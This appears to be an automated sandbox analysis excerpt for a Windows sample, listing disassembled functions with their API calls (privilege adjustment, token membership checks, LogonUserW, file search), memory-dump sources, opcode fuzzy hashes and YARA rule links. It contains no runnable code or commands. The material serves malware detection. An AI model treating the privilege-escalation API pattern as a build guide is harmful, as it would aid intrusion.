                                                        • Opcode ID: 951182d6a3b6a473e2f4411bf32bb8e5d04eca889acbd73c8b1294d7f853362c
                                                        • Instruction ID: 49e48ad123c7eb8c430d76f31d475997bcf61bf265c9a536e307c384f14768f9
                                                        • Opcode Fuzzy Hash: 951182d6a3b6a473e2f4411bf32bb8e5d04eca889acbd73c8b1294d7f853362c
                                                        • Instruction Fuzzy Hash: 3C213235A00518DFCB00DF95D885EEDBBB8FF49314F1480A9E905AB361DB319959CB51
                                                        Function 001187E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000E0DB6: std::exception::exception.LIBCMT ref: 000E0DEC
                                                          • Part of subcall function 000E0DB6: __CxxThrowException@8.LIBCMT ref: 000E0E01
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0011882B
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00118858
                                                        • GetLastError.KERNEL32 ref: 00118865
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1922334811-0
                                                        • Opcode ID: 62fc56cf03b361ff9f8a9785fc1e2d5263c009a95d7b2044ebeaa61fd13c5629
                                                        • Instruction ID: e799ec45ee2863a054b223fbd4e5b02bcd100adc860f1e7df62bc7e4db8b3746
                                                        • Opcode Fuzzy Hash: 62fc56cf03b361ff9f8a9785fc1e2d5263c009a95d7b2044ebeaa61fd13c5629
                                                        • Instruction Fuzzy Hash: 72119DB2404205AFE718DFA4DC85DABB7A9EB45310B20852EF45593612EB70AC818B60
                                                        Function 0011874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00118774
                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0011878B
                                                        • FreeSid.ADVAPI32(?), ref: 0011879B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                        • String ID:
                                                        • API String ID: 3429775523-0
                                                        • Opcode ID: 4ca5a8493e0d23bcdb04688de8f23e2621cfb342be6b54a6abb014a2ff0ca35b
                                                        • Instruction ID: ab39e3fc282ffa0d42402e1fc5cbd0d11586680238682e5df3eee9d8c069a2c0
                                                        • Opcode Fuzzy Hash: 4ca5a8493e0d23bcdb04688de8f23e2621cfb342be6b54a6abb014a2ff0ca35b
                                                        • Instruction Fuzzy Hash: 22F04979A1130CBFDF04DFF4DC89AAEBBBDEF08201F1044A9A901E3691E7716A448B50
                                                        Function 0012C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0012C6FB
                                                        • FindClose.KERNEL32(00000000), ref: 0012C72B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: af3e7f594183cdde979e074156996fd1c57dc0b96e8b882b9506481fc34bd2d8
                                                        • Instruction ID: 33dd6843f1efb0841ff231f60d08899448fbbce063fee75fb3a2e812f537b5c1
                                                        • Opcode Fuzzy Hash: af3e7f594183cdde979e074156996fd1c57dc0b96e8b882b9506481fc34bd2d8
                                                        • Instruction Fuzzy Hash: 9F118E766006009FDB10DF29D849E6EF7E9FF85320F00851DF9A9872A1DB30A805CB91
                                                        Function 0012A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00139468,?,0014FB84,?), ref: 0012A097
                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00139468,?,0014FB84,?), ref: 0012A0A9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ErrorFormatLastMessage
                                                        • String ID:
                                                        • API String ID: 3479602957-0
                                                        • Opcode ID: 4747cef4f52005f4eea9642c38bf29dd7e4fed263fb2d46541625412338ef110
                                                        • Instruction ID: d71c067a47c0fa05acbdb033700485212983a5706a9fd17827e5ecff8b1d70d0
                                                        • Opcode Fuzzy Hash: 4747cef4f52005f4eea9642c38bf29dd7e4fed263fb2d46541625412338ef110
                                                        • Instruction Fuzzy Hash: 5BF0823910522DABDB219FA4DC48FEA776CBF09361F008269F909D6292D7709954CBA1
                                                        Function 001181CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00118309), ref: 001181E0
                                                        • CloseHandle.KERNEL32(?,?,00118309), ref: 001181F2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                        • String ID:
                                                        • API String ID: 81990902-0
                                                        • Opcode ID: 0d8e303012f9112852cebd71d2615c3e141c77500ba2d37716f00b98fba650bd
                                                        • Instruction ID: 6774db933f925824b39ff77ea1a60be62fc6cd7369b8b934c4503a3357553db7
                                                        • Opcode Fuzzy Hash: 0d8e303012f9112852cebd71d2615c3e141c77500ba2d37716f00b98fba650bd
                                                        • Instruction Fuzzy Hash: 1EE0EC76010610AFE7262B61EC09DB77BEEEF04310714883DF8A684971DB62ACD1DB10
                                                        Function 000EA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,000E8D57,?,?,?,00000001), ref: 000EA15A
                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 000EA163
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 90c287fbb11db515f81d8fe5b4b3aeb418d57e4f4ff8e1af8aa8f7cd4236fba6
                                                        • Instruction ID: f6e371a4eb1a5e8086de6210deb1abde3f990edb3bc206889ccb09fee1809598
                                                        • Opcode Fuzzy Hash: 90c287fbb11db515f81d8fe5b4b3aeb418d57e4f4ff8e1af8aa8f7cd4236fba6
                                                        • Instruction Fuzzy Hash: 13B09235054208ABCA002F91EC09F883F68FB46AA2F404024F60D84A70CB625492CA91
                                                        Function 000EF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c7cb7fe0b8d6126f70d973311140043d0163965b9410513b8d3abccb7827816b
                                                        • Instruction ID: 9c34cda582c3e3a90a0440250efba92280e1fa0a7f31a013f352df07ce62ce50
                                                        • Opcode Fuzzy Hash: c7cb7fe0b8d6126f70d973311140043d0163965b9410513b8d3abccb7827816b
                                                        • Instruction Fuzzy Hash: B432F322D29F428DD7639635D932335A289AFB73C5F15D737E81AB9DA6EB28C4C34100
                                                        Function 000F242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4eeba7046ca0fd4b64d093f79fc43022e081fa919a85097cb5c5259c71296956
                                                        • Instruction ID: eb2c55fc15b0af6cd9a26171c8a6507ea375280bc4a94773d6ee555fd5f0446e
                                                        • Opcode Fuzzy Hash: 4eeba7046ca0fd4b64d093f79fc43022e081fa919a85097cb5c5259c71296956
                                                        • Instruction Fuzzy Hash: 1CB1E120D6AF418DD26396398835336BA5CBFBB2CAF91D71BFC1678D22EB2185C34141
                                                        Function 00128889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __time64.LIBCMT ref: 0012889B
                                                          • Part of subcall function 000E520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00128F6E,00000000,?,?,?,?,0012911F,00000000,?), ref: 000E5213
                                                          • Part of subcall function 000E520A: __aulldiv.LIBCMT ref: 000E5233
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                        • String ID:
                                                        • API String ID: 2893107130-0
                                                        • Opcode ID: 4a1e04471296bdb627fac3a733b6e6dc08caee0d418b283401d6e244bd9fc526
                                                        • Instruction ID: 93ddac0814030f647ffe0a0daa760467cb747cdaed392dd6d8ff86fa7afc3cb7
                                                        • Opcode Fuzzy Hash: 4a1e04471296bdb627fac3a733b6e6dc08caee0d418b283401d6e244bd9fc526
                                                        • Instruction Fuzzy Hash: 4421AF326256208BC729CF29D841A52B3E1EBA5311F688E6CD1F5CB2C0CB34BA45CB94
                                                        Function 00124C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00124C4A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: mouse_event
                                                        • String ID:
                                                        • API String ID: 2434400541-0
                                                        • Opcode ID: 6d6476b503d4e5359e064a4d13c77e7df112ffa309053894e8041c79c610146c
                                                        • Instruction ID: 1982282cac57d74ec1005e952ccf0864e595a641119646142f9dba20d300c11b
                                                        • Opcode Fuzzy Hash: 6d6476b503d4e5359e064a4d13c77e7df112ffa309053894e8041c79c610146c
                                                        • Instruction Fuzzy Hash: A3D05EA51652393BEE1C0728BE0FF7A0108E301792FD1814971018E0C1EE809CB05430
                                                        Function 001187B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00118389), ref: 001187D1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: LogonUser
                                                        • String ID:
                                                        • API String ID: 1244722697-0
                                                        • Opcode ID: 96c1f8c10d419e61b63268e89b20ef6afee4f0c635bb0e269788277a992c19ce
                                                        • Instruction ID: 14dae722be3da0392da71584c6ed78dc493e2237634c51411902d32fa3746dcd
                                                        • Opcode Fuzzy Hash: 96c1f8c10d419e61b63268e89b20ef6afee4f0c635bb0e269788277a992c19ce
                                                        • Instruction Fuzzy Hash: 5CD05E3226050EABEF018EA4DC05EAF3B6AEB04B01F408111FE15C61A1C775D835AB60
                                                        Function 000EA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 000EA12A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 2789fd0a1b8356ff5ab1fb807f708b4b4363447205b801e4d50658d2f4ac2a46
                                                        • Instruction ID: cbaf64d27939dd503da1718a83e07af26a2e13013bec4e9007a5725e71c43302
                                                        • Opcode Fuzzy Hash: 2789fd0a1b8356ff5ab1fb807f708b4b4363447205b801e4d50658d2f4ac2a46
                                                        • Instruction Fuzzy Hash: A1A0123000010CA78A001F41EC048447F5CE7015907004020F40C40531873254518580
                                                        Function 000D8808 Relevance: .6, Instructions: 590COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ac6b6b98797bca176c1aadcff554034faa42b4aaa8f0bdc19c72cd3e8e2fa1fa
                                                        • Instruction ID: aa3f8211606a362d3f3a37e47977159e6f91682d6e54570eaa6a0bea2f42418a
                                                        • Opcode Fuzzy Hash: ac6b6b98797bca176c1aadcff554034faa42b4aaa8f0bdc19c72cd3e8e2fa1fa
                                                        • Instruction Fuzzy Hash: F9222530504716CBEF3C8A68C4A46BCB7E2BF81344F69C06BD59687692DB709DD1CB62
                                                        Function 000E21C5 Relevance: .3, Instructions: 345COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                        • Instruction ID: de688585cd31c85aa32646145c86b8f54b1a00eaedcceef5426de1cb0ecab516
                                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                        • Instruction Fuzzy Hash: 31C163322091D30EDBAD463B887417EBAE55FA27B131A076DD4B3EB1D4EE20C975D620
                                                        Function 000E25FA Relevance: .3, Instructions: 341COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                        • Instruction ID: 8c2639288d4a405bcf7f77c7818d61294dff7a0e263eb61e2e7bf4d320129e61
                                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                        • Instruction Fuzzy Hash: 66C180322091D30EDFAD463B883407EBAE55FA27B131A176DD4B2EB1D5EE20C975D620
                                                        Function 000E1978 Relevance: .3, Instructions: 323COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction ID: 945c39c5b357f57b36121bd83260bcb79e2f0a6fedf8d335b308cd1d30f2e7aa
                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction Fuzzy Hash: CCC16D322091D30DDFAD463B88741BEBAE15FA27B131A076DD4B2EB1D5EE30C9659620
                                                        Function 014D0020 Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014CC000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_14cc000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                        • Instruction ID: 1173775c8d37dec37e770053087d202910f49d7be9c618660a8f3ee47964277f
                                                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                        • Instruction Fuzzy Hash: 0B41D571D1051CEBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB40
                                                        Function 014CFF10 Relevance: .0, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014CC000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_14cc000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                        • Instruction ID: 31a1fc19b3046201ee1f1e8a35df6f74ebf502a90579d6ec6f59e0dd7e7b42e5
                                                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                        • Instruction Fuzzy Hash: 96019678A0010AEFCB84DF99C5909AEF7B6FF48710F20859AE819A7351D734AE41DB84
                                                        Function 014CFEB0 Relevance: .0, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014CC000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_14cc000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                        • Instruction ID: e77a1096340d5e1726e71128e9a7d0a60bda9f0390de5fde637c40e0c7f5f35f
                                                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
